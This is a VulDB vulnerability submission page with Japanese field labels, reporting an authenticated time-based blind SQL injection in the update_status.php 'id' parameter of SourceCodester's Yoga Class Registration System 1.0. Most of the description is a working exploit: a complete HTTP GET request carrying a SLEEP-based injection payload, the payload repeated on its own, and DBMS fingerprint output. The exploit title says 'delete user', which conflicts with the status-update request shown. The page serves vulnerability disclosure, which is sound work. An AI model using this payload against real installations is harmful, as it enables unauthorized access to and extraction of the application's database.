| タイトル | Authenticated POST based SQL Injection when Update status on Yoga Class Registration System |
|---|
| 説明 | # Exploit Title: Authenticated POST based SQL Injection when delete user on Yoga Class Registration System
# Google Dork: NA
# Date: 23/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
# Software Link: [download link if available]
# Version: 1.0
# Tested on: Windows 11
# Payload
GET /php-ycrs/admin/registrations/update_status.php?id=2'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjU HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/php-ycrs/admin/?page=registrations/view_registration&id=2
Cookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhg
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
##Payload
'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjU
the back-end DBMS is MySQL
web application technology: PHP 8.0.25, Apache 2.4.54
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
|
|---|
| ソース | ⚠️ https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html |
|---|
| ユーザー | mroz1l (UID 41497) |
|---|
| 送信 | 2023年02月23日 11:27 (3 年 ago) |
|---|
| モデレーション | 2023年02月23日 12:05 (38 minutes later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 221675 [SourceCodester Yoga Class Registration System 1.0 Status Update update_status.php 識別子 SQLインジェクション] |
|---|
| ポイント | 20 |
|---|